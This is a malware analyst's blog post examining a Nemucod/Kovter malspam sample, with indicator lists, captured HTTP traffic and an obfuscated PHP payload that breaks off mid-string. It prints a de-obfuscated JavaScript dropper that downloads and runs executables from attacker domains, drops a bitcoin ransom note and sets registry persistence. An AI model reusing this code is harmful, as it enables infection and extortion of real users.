{"id":571,"date":"2016-07-21T11:54:14","date_gmt":"2016-07-21T10:54:14","guid":{"rendered":"http:\/\/www.herbiez.com\/?p=571"},"modified":"2016-07-21T11:54:14","modified_gmt":"2016-07-21T10:54:14","slug":"2016-07-20-another-nemucodkovter-malspam-example","status":"publish","type":"post","link":"https:\/\/www.herbiez.com\/?p=571","title":{"rendered":"2016-07-20 Another Nemucod\/Kovter Malspam Example"},"content":{"rendered":"

Here is another example of Nemucod\/Kovter that I saw at work. It very much resembles another one that I saw and wrote up a while ago (see http:\/\/www.herbiez.com\/?p=535<\/a>). For more information about how Nemucod\/Kovter keeps it’s persistence on the host system then please read this excellent blog post on MalwareBytes’ blog here<\/a>. Since the MalwareByte’s blog covers the filesystem aspect incredibly well, I am not going to talk about it here since this one mimics what is seen in the blog post. Also, if you would like to see the artifacts found in this investigation, please see the Github repo here<\/a>. Below is my analysis of this one from some malspam.<\/p>\n

Indicators of Compromise: (based on URL Revealer and from the PCAP)
\n===================================================================<\/p>\n

\r\nhttp:\/\/conbive.org\/counter\/?ad=19eBRNV8sxUWGjeQZYU3t7UGWrXK11LFqg&id=a5EDyaa6RhRlNZwZDV_Eow41e2XnyjdUQ8jGkSthiSqorYyqqUJYRGgw6mtGWq17TRFIsH8zjUF2jZOAI1dYXhc92ckiGi7Tpfg_tw&rnd=01\r\nhttp:\/\/empiricalstudyoflaw.com\/counter\/?ad=19eBRNV8sxUWGjeQZYU3t7UGWrXK11LFqg&id=a5EDyaa6RhRlNZwZDV_Eow41e2XnyjdUQ8jGkSthiSqorYyqqUJYRGgw6mtGWq17TRFIsH8zjUF2jZOAI1dYXhc92ckiGi7Tpfg_tw&rnd=11\r\nhttp:\/\/tricksstudy.com\/counter\/?ad=19eBRNV8sxUWGjeQZYU3t7UGWrXK11LFqg&id=a5EDyaa6RhRlNZwZDV_Eow41e2XnyjdUQ8jGkSthiSqorYyqqUJYRGgw6mtGWq17TRFIsH8zjUF2jZOAI1dYXhc92ckiGi7Tpfg_tw&rnd=21\r\nhttp:\/\/experiotech.com\/counter\/?ad=19eBRNV8sxUWGjeQZYU3t7UGWrXK11LFqg&id=a5EDyaa6RhRlNZwZDV_Eow41e2XnyjdUQ8jGkSthiSqorYyqqUJYRGgw6mtGWq17TRFIsH8zjUF2jZOAI1dYXhc92ckiGi7Tpfg_tw&rnd=31\r\nhttp:\/\/novinnamak.com\/counter\/?ad=19eBRNV8sxUWGjeQZYU3t7UGWrXK11LFqg&id=a5EDyaa6RhRlNZwZDV_Eow41e2XnyjdUQ8jGkSthiSqorYyqqUJYRGgw6mtGWq17TRFIsH8zjUF2jZOAI1dYXhc92ckiGi7Tpfg_tw&rnd=41\r\nhttp:\/\/conbive.org\/counter\/?ad=19eBRNV8sxUWGjeQZYU3t7UGWrXK11LFqg&id=a5EDyaa6RhRlNZwZDV_Eow41e2XnyjdUQ8jGkSthiSqorYyqqUJYRGgw6mtGWq17TRFIsH8zjUF2jZOAI1dYXhc92ckiGi7Tpfg_tw&rnd=02\r\nhttp:\/\/empiricalstudyoflaw.com\/counter\/?ad=19eBRNV8sxUWGjeQZYU3t7UGWrXK11LFqg&id=a5EDyaa6RhRlNZwZDV_Eow41e2XnyjdUQ8jGkSthiSqorYyqqUJYRGgw6mtGWq17TRFIsH8zjUF2jZOAI1dYXhc92ckiGi7Tpfg_tw&rnd=12\r\nhttp:\/\/tricksstudy.com\/counter\/?ad=19eBRNV8sxUWGjeQZYU3t7UGWrXK11LFqg&id=a5EDyaa6RhRlNZwZDV_Eow41e2XnyjdUQ8jGkSthiSqorYyqqUJYRGgw6mtGWq17TRFIsH8zjUF2jZOAI1dYXhc92ckiGi7Tpfg_tw&rnd=22\r\nhttp:\/\/experiotech.com\/counter\/?ad=19eBRNV8sxUWGjeQZYU3t7UGWrXK11LFqg&id=a5EDyaa6RhRlNZwZDV_Eow41e2XnyjdUQ8jGkSthiSqorYyqqUJYRGgw6mtGWq17TRFIsH8zjUF2jZOAI1dYXhc92ckiGi7Tpfg_tw&rnd=32\r\nhttp:\/\/novinnamak.com\/counter\/?ad=19eBRNV8sxUWGjeQZYU3t7UGWrXK11LFqg&id=a5EDyaa6RhRlNZwZDV_Eow41e2XnyjdUQ8jGkSthiSqorYyqqUJYRGgw6mtGWq17TRFIsH8zjUF2jZOAI1dYXhc92ckiGi7Tpfg_tw&rnd=42\r\nhttp:\/\/conbive.org\/counter\/?ad=19eBRNV8sxUWGjeQZYU3t7UGWrXK11LFqg&id=a5EDyaa6RhRlNZwZDV_Eow41e2XnyjdUQ8jGkSthiSqorYyqqUJYRGgw6mtGWq17TRFIsH8zjUF2jZOAI1dYXhc92ckiGi7Tpfg_tw&rnd=03\r\nhttp:\/\/empiricalstudyoflaw.com\/counter\/?ad=19eBRNV8sxUWGjeQZYU3t7UGWrXK11LFqg&id=a5EDyaa6RhRlNZwZDV_Eow41e2XnyjdUQ8jGkSthiSqorYyqqUJYRGgw6mtGWq17TRFIsH8zjUF2jZOAI1dYXhc92ckiGi7Tpfg_tw&rnd=13\r\nhttp:\/\/tricksstudy.com\/counter\/?ad=19eBRNV8sxUWGjeQZYU3t7UGWrXK11LFqg&id=a5EDyaa6RhRlNZwZDV_Eow41e2XnyjdUQ8jGkSthiSqorYyqqUJYRGgw6mtGWq17TRFIsH8zjUF2jZOAI1dYXhc92ckiGi7Tpfg_tw&rnd=23\r\nhttp:\/\/experiotech.com\/counter\/?ad=19eBRNV8sxUWGjeQZYU3t7UGWrXK11LFqg&id=a5EDyaa6RhRlNZwZDV_Eow41e2XnyjdUQ8jGkSthiSqorYyqqUJYRGgw6mtGWq17TRFIsH8zjUF2jZOAI1dYXhc92ckiGi7Tpfg_tw&rnd=33\r\nhttp:\/\/novinnamak.com\/counter\/?ad=19eBRNV8sxUWGjeQZYU3t7UGWrXK11LFqg&id=a5EDyaa6RhRlNZwZDV_Eow41e2XnyjdUQ8jGkSthiSqorYyqqUJYRGgw6mtGWq17TRFIsH8zjUF2jZOAI1dYXhc92ckiGi7Tpfg_tw&rnd=43\r\nhttp:\/\/conbive.org\/counter\/?ad=19eBRNV8sxUWGjeQZYU3t7UGWrXK11LFqg&id=a5EDyaa6RhRlNZwZDV_Eow41e2XnyjdUQ8jGkSthiSqorYyqqUJYRGgw6mtGWq17TRFIsH8zjUF2jZOAI1dYXhc92ckiGi7Tpfg_tw&rnd=04\r\nhttp:\/\/empiricalstudyoflaw.com\/counter\/?ad=19eBRNV8sxUWGjeQZYU3t7UGWrXK11LFqg&id=a5EDyaa6RhRlNZwZDV_Eow41e2XnyjdUQ8jGkSthiSqorYyqqUJYRGgw6mtGWq17TRFIsH8zjUF2jZOAI1dYXhc92ckiGi7Tpfg_tw&rnd=14\r\nhttp:\/\/tricksstudy.com\/counter\/?ad=19eBRNV8sxUWGjeQZYU3t7UGWrXK11LFqg&id=a5EDyaa6RhRlNZwZDV_Eow41e2XnyjdUQ8jGkSthiSqorYyqqUJYRGgw6mtGWq17TRFIsH8zjUF2jZOAI1dYXhc92ckiGi7Tpfg_tw&rnd=24\r\nhttp:\/\/experiotech.com\/counter\/?ad=19eBRNV8sxUWGjeQZYU3t7UGWrXK11LFqg&id=a5EDyaa6RhRlNZwZDV_Eow41e2XnyjdUQ8jGkSthiSqorYyqqUJYRGgw6mtGWq17TRFIsH8zjUF2jZOAI1dYXhc92ckiGi7Tpfg_tw&rnd=34\r\nhttp:\/\/novinnamak.com\/counter\/?ad=19eBRNV8sxUWGjeQZYU3t7UGWrXK11LFqg&id=a5EDyaa6RhRlNZwZDV_Eow41e2XnyjdUQ8jGkSthiSqorYyqqUJYRGgw6mtGWq17TRFIsH8zjUF2jZOAI1dYXhc92ckiGi7Tpfg_tw&rnd=44\r\nhttp:\/\/conbive.org\/counter\/?ad=19eBRNV8sxUWGjeQZYU3t7UGWrXK11LFqg&id=a5EDyaa6RhRlNZwZDV_Eow41e2XnyjdUQ8jGkSthiSqorYyqqUJYRGgw6mtGWq17TRFIsH8zjUF2jZOAI1dYXhc92ckiGi7Tpfg_tw&rnd=05\r\nhttp:\/\/empiricalstudyoflaw.com\/counter\/?ad=19eBRNV8sxUWGjeQZYU3t7UGWrXK11LFqg&id=a5EDyaa6RhRlNZwZDV_Eow41e2XnyjdUQ8jGkSthiSqorYyqqUJYRGgw6mtGWq17TRFIsH8zjUF2jZOAI1dYXhc92ckiGi7Tpfg_tw&rnd=15\r\nhttp:\/\/tricksstudy.com\/counter\/?ad=19eBRNV8sxUWGjeQZYU3t7UGWrXK11LFqg&id=a5EDyaa6RhRlNZwZDV_Eow41e2XnyjdUQ8jGkSthiSqorYyqqUJYRGgw6mtGWq17TRFIsH8zjUF2jZOAI1dYXhc92ckiGi7Tpfg_tw&rnd=25\r\nhttp:\/\/experiotech.com\/counter\/?ad=19eBRNV8sxUWGjeQZYU3t7UGWrXK11LFqg&id=a5EDyaa6RhRlNZwZDV_Eow41e2XnyjdUQ8jGkSthiSqorYyqqUJYRGgw6mtGWq17TRFIsH8zjUF2jZOAI1dYXhc92ckiGi7Tpfg_tw&rnd=35\r\nhttp:\/\/novinnamak.com\/counter\/?ad=19eBRNV8sxUWGjeQZYU3t7UGWrXK11LFqg&id=a5EDyaa6RhRlNZwZDV_Eow41e2XnyjdUQ8jGkSthiSqorYyqqUJYRGgw6mtGWq17TRFIsH8zjUF2jZOAI1dYXhc92ckiGi7Tpfg_tw&rnd=45\r\n155.254.148.45 \/ 80\r\n5.14.122.140 \/ 8080\r\n112.61.145.190 \/ 8080 \r\n5.91.37.133 \/ 8080 \r\n16.63.81.184 \/ 8080 \r\n139.163.70.63 \/ 8080 \r\n61.66.106.239 \/ 8080 \r\n43.102.191.80 \/ 8080 \r\n151.107.25.173 \/ 8080 \r\n76.181.148.151 \/ 8080 \r\n183.182.3.152 \/ 8080 \r\n33.101.35.120 \/ 8080 \r\n192.84.242.167 \/ 8080 \r\n138.67.209.103 \/ 8080 \r\n9.32.28.109 \/ 8080 \r\n50.31.10.82 \/ 8080 \r\n131.228.41.82 \/ 8080 \r\n94.129.18.183 \/ 8080 \r\n78.166.24.73 \/ 8080 \r\n147.14.246.62 \/ 8080 \r\n81.10.119.201 \/ 8080 \r\n118.27.184.191 \/ 8080 \r\n200.199.218.108 \/ 8080 \r\n193.161.82.58 \/ 8080 \r\n169.76.157.79 \/ 8080 \r\n73.65.34.145 \/ 8080 \r\n145.64.255.36 \/ 8080 \r\n147.47.111.54 \/ 8080<\/pre>\n
Below is the screen cap of the malicious email:<\/p>\n
\"\"<\/a><\/p>\n
Information about the malspam:
\n==============================
\nAs stated above, the email that was sent had a zip file that once unzipped had a javascript file in it. The javascript has the following details:<\/p>\n
File name: FedEx_00000763083.doc.js
\nSize: 55.7KB
\nSHA256: d2a58bfce71df20f230bd4ee63d691a65760da490a59e92f351f300c37e05535
\nVT link: NA
\nHybrid Analysis: NA
\nMalwr: NA<\/p>\n
The javascript file is obfuscated and makes no sense, but using Revelo and the option of “send eval to action” I was able to de-obfuscate the code:<\/p>\n
 \r\n var id="a5EDyaa6RhRlNZwZDV_Eow41e2XnyjdUQ8jGkSthiSqorYyqqUJYRGgw6mtGWq17TRFIsH8zjUF2jZOAI1dYXhc92ckiGi7Tpfg_tw";\r\n var ad="19eBRNV8sxUWGjeQZYU3t7UGWrXK11LFqg";\r\n var bc="0.43946";\r\n var ld=0;\r\n var cq=String.fromCharCode(34);\r\n var cs=String.fromCharCode(92);\r\n var ll=["conbive.org","empiricalstudyoflaw.com","tricksstudy.com","experiotech.com","novinnamak.com"];\r\n var ws=WScript.CreateObject("WScript.Shell");\r\n var fn=ws.ExpandEnvironmentStrings("%TEMP%")+cs+"a";\r\n var pd=ws.ExpandEnvironmentStrings("%TEMP%")+cs+"php4ts.dll";\r\n var xo=WScript.CreateObject("Msxml2.XMLHTTP");\r\n var xa=WScript.CreateObject("ADODB.Stream");\r\n var fo=WScript.CreateObject("Scripting.FileSystemObject");\r\n if (!fo.FileExists(fn+".txt"))\r\n {\r\n   for(var n=1;\r\n   n<=5;\r\n   n++)\r\n   {\r\n     for(var i=ld;\r\n     i<ll.length;\r\n     i++)\r\n     {\r\n       var dn=0;\r\n       try\r\n       {\r\n         xo.open("GET","http:\/\/"+ll[i]+"\/counter\/?ad="+ad+"&id="+id+"&rnd="+i+n, false);\r\n         xo.send();\r\n         if(xo.status==200)\r\n         {\r\n           xa.open();\r\n           xa.type=1;\r\n           xa.write(xo.responseBody);\r\n           if(xa.size>1000)\r\n           {\r\n             dn=1;\r\n             if(n<=2)\r\n             {\r\n               xa.saveToFile(fn+n+".exe",2);\r\n               try\r\n               {\r\n                 ws.Run(fn+n+".exe",1,0);\r\n               }\r\n               catch(er)\r\n               {\r\n                 \r\n               }\r\n               ;\r\n             }\r\n             else if(n==3)\r\n             {\r\n               xa.saveToFile(fn+".exe",2);\r\n             }\r\n             else if(n==4)\r\n             {\r\n               xa.saveToFile(pd,2);\r\n             }\r\n             else if(n==5)\r\n             {\r\n               xa.saveToFile(fn+".php",2);\r\n             }\r\n             \r\n           }\r\n           ; xa.close();\r\n           \r\n         }\r\n         ; if(dn==1)\r\n         {\r\n           ld=i;\r\n           break;\r\n         }\r\n         ;\r\n       }\r\n       catch(er)\r\n       {\r\n         \r\n       }\r\n       ;\r\n     }\r\n     ;\r\n   }\r\n   ; if(fo.FileExists(fn+".exe") && fo.FileExists(pd) && fo.FileExists(fn+".php"))\r\n   {\r\n     var fp=fo.CreateTextFile(fn+".txt",true);\r\n     fp.WriteLine("ATTENTION!");\r\n     fp.WriteLine("");\r\n     fp.WriteLine("All your documents, photos, databases and other important personal files");\r\n     fp.WriteLine("were encrypted using strong RSA-1024 algorithm with a unique key.");\r\n     fp.WriteLine("To restore your files you have to pay "+bc+" BTC (bitcoins).");\r\n     fp.WriteLine("Please follow this manual:");\r\n     fp.WriteLine("");\r\n     fp.WriteLine("1. Create Bitcoin wallet here:");\r\n     fp.WriteLine("");\r\n     fp.WriteLine("      http:\/\/blockchain.info\/wallet\/new");\r\n     fp.WriteLine("");\r\n     fp.WriteLine("2. Buy "+bc+" BTC with cash, using search here:");\r\n     fp.WriteLine("");\r\n     fp.WriteLine("      http:\/\/localbitcoins.com\/buy_bitcoins");\r\n     fp.WriteLine("");\r\n     fp.WriteLine("3. Send "+bc+" BTC to this Bitcoin address:");\r\n     fp.WriteLine("");\r\n     fp.WriteLine("      "+ad);\r\n     fp.WriteLine("");\r\n     fp.WriteLine("4. Open one of the following links in your browser to download decryptor:");\r\n     fp.WriteLine("");\r\n     for (var i=0;\r\n     i<ll.length;\r\n     i++)\r\n     {\r\n       fp.WriteLine("      http:\/\/"+ll[i]+"\/counter\/?a="+ad);\r\n       \r\n     }\r\n     ; fp.WriteLine("");\r\n     fp.WriteLine("5. Run decryptor to restore your files.");\r\n     fp.WriteLine("");\r\n     fp.WriteLine("PLEASE REMEMBER:");\r\n     fp.WriteLine("");\r\n     fp.WriteLine("      - If you do not pay in 3 days YOU LOOSE ALL YOUR FILES.");\r\n     fp.WriteLine("      - Nobody can help you except us.");\r\n     fp.WriteLine("      - It`s useless to reinstall Windows, update antivirus software, etc.");\r\n     fp.WriteLine("      - Your files can be decrypted only after you make payment.");\r\n     fp.WriteLine("      - You can find this manual on your desktop (DECRYPT.txt).");\r\n     fp.Close();\r\n     ws.Run("%COMSPEC% \/c REG ADD "+cq+"HKCU"+cs+"SOFTWARE"+cs+"Microsoft"+cs+"Windows"+cs+"CurrentVersion"+cs+"Run"+cq+" \/V "+cq+"Crypted"+cq+" \/t REG_SZ \/F \/D "+cq+fn+".txt"+cq,0,0);\r\n     ws.Run("%COMSPEC% \/c REG ADD "+cq+"HKCR"+cs+".crypted"+cq+" \/ve \/t REG_SZ \/F \/D "+cq+"Crypted"+cq,0,0);\r\n     ws.Run("%COMSPEC% \/c REG ADD "+cq+"HKCR"+cs+"Crypted"+cs+"shell"+cs+"open"+cs+"command"+cq+" \/ve \/t REG_SZ \/F \/D "+cq+"notepad.exe "+cs+cq+fn+".txt"+cs+cq+cq,0,0);\r\n     ws.Run("%COMSPEC% \/c copy \/y "+cq+fn+".txt"+cq+" "+cq+"%AppData%"+cs+"Desktop"+cs+"DECRYPT.txt"+cq,0,0);\r\n     ws.Run("%COMSPEC% \/c copy \/y "+cq+fn+".txt"+cq+" "+cq+"%UserProfile%"+cs+"Desktop"+cs+"DECRYPT.txt"+cq,0,0);\r\n     ws.Run("%COMSPEC% \/c "+fn+".exe "+cq+fn+".php"+cq,0,1);\r\n     ws.Run("%COMSPEC% \/c notepad.exe "+cq+fn+".txt"+cq,0,0);\r\n     var fp=fo.CreateTextFile(fn+".php",true);\r\n     for(var i=0;\r\n     i<1000;\r\n     i++)\r\n     {\r\n       fp.WriteLine(ad);\r\n     }\r\n     ;fp.Close();\r\n     ws.Run("%COMSPEC% \/c DEL "+cq+fn+".php"+cq,0,0);\r\n     ws.Run("%COMSPEC% \/c DEL "+cq+fn+".exe"+cq,0,0);\r\n     ws.Run("%COMSPEC% \/c DEL "+cq+pd+cq,0,0);\r\n     \r\n   }\r\n   ;\r\n }\r\n ;<\/pre>\n
Investigation of the malspam
\n============================
\nFrom the network perspective, even though there are 5 different domains listed in the above code the only one that is used is the domain of ‘conbive.org’ with the URI string of ‘\/counter\/?ad=19eBRNV8sxUWGjeQZYU3t7UGWrXK11LFqg&id=a5EDyaa6RhRlNZwZDV_Eow41e2XnyjdUQ8jGkSthiSqorYyqqUJYRGgw6mtGWq17TRFIsH8zjUF2jZOAI1dYXhc92ckiGi7Tpfg_tw&rnd=’. The interesting one that gets downloaded is the last one (05) as that looks to be obfuscated PHP code (as seen below – filename=8fe422ece.png). Also notice that all the files requested are for PNG files, but really are binary\/PHP script files instead.<\/p>\n
\r\nGET \/counter\/?ad=19eBRNV8sxUWGjeQZYU3t7UGWrXK11LFqg&id=a5EDyaa6RhRlNZwZDV_Eow41e2XnyjdUQ8jGkSthiSqorYyqqUJYRGgw6mtGWq17TRFIsH8zjUF2jZOAI1dYXhc92ckiGi7Tpfg_tw&rnd=01 HTTP\/1.1\r\nAccept: *\/*\r\nUA-CPU: AMD64\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident\/6.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)\r\nHost: conbive.org\r\nConnection: Keep-Alive\r\n\r\nHTTP\/1.1 200 OK\r\nDate: Wed, 20 Jul 2016 09:27:19 GMT\r\nServer: Apache Phusion_Passenger\/4.0.10 mod_bwlimited\/1.4 mod_fcgid\/2.3.9\r\nX-Powered-By: PHP\/5.4.45\r\nContent-Disposition: attachment; filename=762df.png\r\nContent-Length: 317269\r\nContent-Type: image\/png\r\nX-Pad: avoid browser bug\r\n\r\nMZ......................@.............................................\t.!..L.!This program cannot be run in DOS mode.\r\n\r\n-----\r\n\r\nGET \/counter\/?ad=19eBRNV8sxUWGjeQZYU3t7UGWrXK11LFqg&id=a5EDyaa6RhRlNZwZDV_Eow41e2XnyjdUQ8jGkSthiSqorYyqqUJYRGgw6mtGWq17TRFIsH8zjUF2jZOAI1dYXhc92ckiGi7Tpfg_tw&rnd=02 HTTP\/1.1\r\nAccept: *\/*\r\nUA-CPU: AMD64\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident\/6.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)\r\nHost: conbive.org\r\nConnection: Keep-Alive\r\n\r\nHTTP\/1.1 200 OK\r\nDate: Wed, 20 Jul 2016 09:27:25 GMT\r\nServer: Apache Phusion_Passenger\/4.0.10 mod_bwlimited\/1.4 mod_fcgid\/2.3.9\r\nX-Powered-By: PHP\/5.4.45\r\nContent-Disposition: attachment; filename=9ee89b53cd.png\r\nContent-Length: 127094\r\nContent-Type: image\/png\r\n\r\nMZ......................@.............................................\t.!..L.!This program cannot be run in DOS mode.\r\n\r\n-----\r\n\r\nGET \/counter\/?ad=19eBRNV8sxUWGjeQZYU3t7UGWrXK11LFqg&id=a5EDyaa6RhRlNZwZDV_Eow41e2XnyjdUQ8jGkSthiSqorYyqqUJYRGgw6mtGWq17TRFIsH8zjUF2jZOAI1dYXhc92ckiGi7Tpfg_tw&rnd=03 HTTP\/1.1\r\nAccept: *\/*\r\nUA-CPU: AMD64\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident\/6.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)\r\nHost: conbive.org\r\nConnection: Keep-Alive\r\n\r\nHTTP\/1.1 200 OK\r\nDate: Wed, 20 Jul 2016 09:27:27 GMT\r\nServer: Apache Phusion_Passenger\/4.0.10 mod_bwlimited\/1.4 mod_fcgid\/2.3.9\r\nX-Powered-By: PHP\/5.4.45\r\nContent-Disposition: attachment; filename=f.png\r\nContent-Length: 45056\r\nContent-Type: image\/png\r\n\r\nMZ......................@.............................................\t.!..L.!This program cannot be run in DOS mode.\r\n\r\n-----\r\n\r\nGET \/counter\/?ad=19eBRNV8sxUWGjeQZYU3t7UGWrXK11LFqg&id=a5EDyaa6RhRlNZwZDV_Eow41e2XnyjdUQ8jGkSthiSqorYyqqUJYRGgw6mtGWq17TRFIsH8zjUF2jZOAI1dYXhc92ckiGi7Tpfg_tw&rnd=04 HTTP\/1.1\r\nAccept: *\/*\r\nUA-CPU: AMD64\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident\/6.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)\r\nHost: conbive.org\r\nConnection: Keep-Alive\r\n\r\nHTTP\/1.1 200 OK\r\nDate: Wed, 20 Jul 2016 09:27:28 GMT\r\nServer: Apache Phusion_Passenger\/4.0.10 mod_bwlimited\/1.4 mod_fcgid\/2.3.9\r\nX-Powered-By: PHP\/5.4.45\r\nContent-Disposition: attachment; filename=689f943bdf9f68b4.png\r\nContent-Length: 1417216\r\nContent-Type: image\/png\r\n\r\nMZ......................@.............................................\t.!..L.!This program cannot be run in DOS mode.\r\n\r\n-----\r\n\r\nGET \/counter\/?ad=19eBRNV8sxUWGjeQZYU3t7UGWrXK11LFqg&id=a5EDyaa6RhRlNZwZDV_Eow41e2XnyjdUQ8jGkSthiSqorYyqqUJYRGgw6mtGWq17TRFIsH8zjUF2jZOAI1dYXhc92ckiGi7Tpfg_tw&rnd=05 HTTP\/1.1\r\nAccept: *\/*\r\nUA-CPU: AMD64\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident\/6.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)\r\nHost: conbive.org\r\nConnection: Keep-Alive\r\n\r\nHTTP\/1.1 200 OK\r\nDate: Wed, 20 Jul 2016 09:27:43 GMT\r\nServer: Apache Phusion_Passenger\/4.0.10 mod_bwlimited\/1.4 mod_fcgid\/2.3.9\r\nX-Powered-By: PHP\/5.4.45\r\nContent-Disposition: attachment; filename=8fe422ece.png\r\nContent-Length: 7283\r\nContent-Type: image\/png\r\n\r\n<?php $t104="pre".chr(103)."_r".chr(101)."place";$m173="e".chr(118)."al(bas".chr(101)."64_decode(".chr(34)."c2V0X3RpbWV".chr(102)."bGlt".chr(97)."XQoMCk7DQoNCm".chr(90)."v".chr(99)."igk".chr(97)."T02N".chr(122)."s".chr(107).chr(97)."Tw".chr(57)."OTA".chr(55).chr(74).chr(71).chr(107)."rKyk".chr(103)."aWYoQG".chr(108)."zX2Rpcihj".chr(97)."HIoJGk".chr(112)."Lic6J".chr(121)."k".chr(112)."IFRy".chr(90)."W".chr(85)."o".chr(89).chr(50)."h".chr(121)."KCR".chr(112)."K".chr(83)."4".chr(110)."Oic".chr(112)."Ow0".chr(75)."DQpmd".chr(87)."5jdGlvbiBUcmV".chr(108)."KCRwKQ0".chr(75)."ew0KC".chr(83).chr(82)."hPSdl".chr(74)."zs".chr(78)."Cgkk".chr(97)."z".chr(49)."iYXNlNjRfZGV".chr(106)."b2".chr(82)."lKCdN".chr(86)."0t".chr(85)."Y".chr(51)."F2a".chr(48)."w1".chr(86)."DVDRXFN".chr(98)."XV3Kz".chr(70).chr(68).chr(83).chr(110)."dXckFHd".chr(49).chr(66)."nd0".chr(77)."z".chr(78)."3hzQ".chr(50)."lnc".chr(67).chr(57)."4UkZHd".chr(107).chr(78).chr(116)."K0lwe".chr(107)."RhZzYxQzFFR0".chr(100)."5K".chr(50)."x".chr(84)."dVF".chr(119)."djBUN".chr(108)."Q1L".chr(48).chr(77)."5aWhQaHN".chr(49)."dkVvby9".chr(111).chr(84)."nFP".chr(79)."DJmOV".chr(108)."0bEF".chr(97)."NF".chr(78)."LRDR".chr(79).chr(83)."C9L".chr(97)."mI3dnZ1".chr(79)."GdOS".chr(85)."RN".chr(100)."0FaT".chr(87).chr(116)."RSnpy".chr(97).chr(70).chr(89)."4Jyk7".chr(68).chr(81)."o".chr(74)."JHM9Y2hyK".chr(68)."kyKTs".chr(78)."Cg".chr(48)."KCWl".chr(109).chr(75)."HByZWdfbWF0Y2goJ".chr(121)."8nL".chr(105)."R".chr(122)."L".chr(105)."RzLicod2lub".chr(110)."R".chr(56)."Y".chr(109).chr(57)."vdHxze".chr(88)."N0ZW18d2lu".chr(90)."G93c3x0bXB8".chr(100).chr(71)."Vt".chr(99)."H".chr(120)."wcm9n".chr(99)."mFtfGFwc".chr(71)."R".chr(104).chr(100)."GF8YX".chr(66)."wbGlj".chr(89)."XR".chr(112)."b".chr(50)."5".chr(56)."cm9hbWluZ".chr(51)."x".chr(116)."c".chr(50)."9".chr(109).chr(90)."m".chr(108)."j".chr(90)."Xx".chr(48).chr(90)."W1wb3Jhcnl8Y2Fj".chr(97)."GUp".chr(76).chr(50)."k".chr(110).chr(76)."C".chr(82)."wKSB8".chr(102)."CBwcm".chr(86)."nX2".chr(49)."h".chr(100)."GNoK".chr(67)."cvcmVjeW".chr(78)."sZS9pJ".chr(121)."wkcCkpIHJldHVy".chr(98)."jsNCg0KCSRkcD1A".chr(98)."3Bl".chr(98)."mRpcigkc".chr(67)."k7DQoNCglpZigkZ".chr(72)."A".chr(57)."PT1".chr(109)."Y".chr(87)."x".chr(122)."ZSkgcmV0dXJuOw0KDQoJd2hpbGU".chr(111)."JG89".chr(81).chr(72).chr(74)."l".chr(89)."W".chr(82)."kaXIoJG".chr(82).chr(119)."K".chr(83)."k".chr(103)."aWYoJG8hPScuJyYmJG8h".chr(80)."Sc".chr(117)."Lic".chr(112)."D".chr(81)."o".chr(74)."ew".chr(48)."KCQl".chr(112)."ZiAoQ".chr(71)."lz".chr(88)."2".chr(82)."pci".chr(103)."kcC4".chr(107)."cy4kbykpDQoJCX".chr(115)."N".chr(67).chr(103)."k".chr(74)."CVRyZWUo".chr(74)."HA".chr(117)."JHMuJG8pO".chr(119)."0KC".chr(81)."l9D".chr(81).chr(111)."JCWVsc2VpZiA".chr(111)."J".chr(71)."E9PSdlJ".chr(121).chr(89).chr(109)."cHJl".chr(90)."19tYXRja".chr(67)."gnL1s".chr(117)."XSh6a".chr(88)."B".chr(56)."c".chr(109).chr(70)."yf".chr(72)."I".chr(119)."MHxyMDF8".chr(99)."j".chr(65)."yfHI".chr(119)."M3w".chr(51)."enx".chr(48)."YX".chr(74)."8Z3p8Z3ppcHxhcmN8YXJqfG".chr(74)."6".chr(102).chr(71).chr(74)."6".chr(77)."nxiemF8YnppcHxiemlwMnxpY2V".chr(56)."eG".chr(120)."zfHh".chr(115)."c".chr(51)."h8".chr(90)."G".chr(57)."jfGR".chr(118)."Y".chr(51)."h".chr(56)."cGR".chr(109)."f".chr(71)."RqdnV8ZmI".chr(121)."f".chr(72)."J0Z".chr(110)."xwcHR8cHB0eH".chr(120).chr(119).chr(99)."HN8c3hp".chr(102)."G9kbXxvZHR8bX".chr(66).chr(119)."fH".chr(78)."z".chr(97)."Hxw".chr(100)."WJ8Z3Bnf".chr(72)."Bn".chr(99)."HxrZGJ".chr(56)."a2RieHx".chr(104)."bHN8YXV".chr(119)."fG".chr(78)."w".chr(99)."nxu".chr(99)."HJ8Y3Bwf".chr(71)."Jh".chr(99)."3xh".chr(99)."2".chr(49)."8Y3".chr(78)."8".chr(99)."Gh".chr(119)."fHBhc3xj".chr(98)."GFzc3xw".chr(101).chr(88)."xwbHxofHZif".chr(72)."ZjcHJv".chr(97).chr(110)."x".chr(50)."YnBy".chr(98)."2p8amF2YXxiYWt8YmFja3Vwf".chr(71)."1kYnxh".chr(89)."2".chr(78)."kYnxtZG".chr(90).chr(56)."b2Ri".chr(102).chr(72)."dkYnxjc3Z".chr(56)."dH".chr(78).chr(50)."fH".chr(78)."xbHxw".chr(99)."2R".chr(56).chr(90)."X".chr(66)."zfGN".chr(107)."cnxjcHR8a".chr(87)."5kZH".chr(120)."k".chr(100)."2".chr(100)."8".chr(89)."Wl8c3Z".chr(110)."fG1heHxz".chr(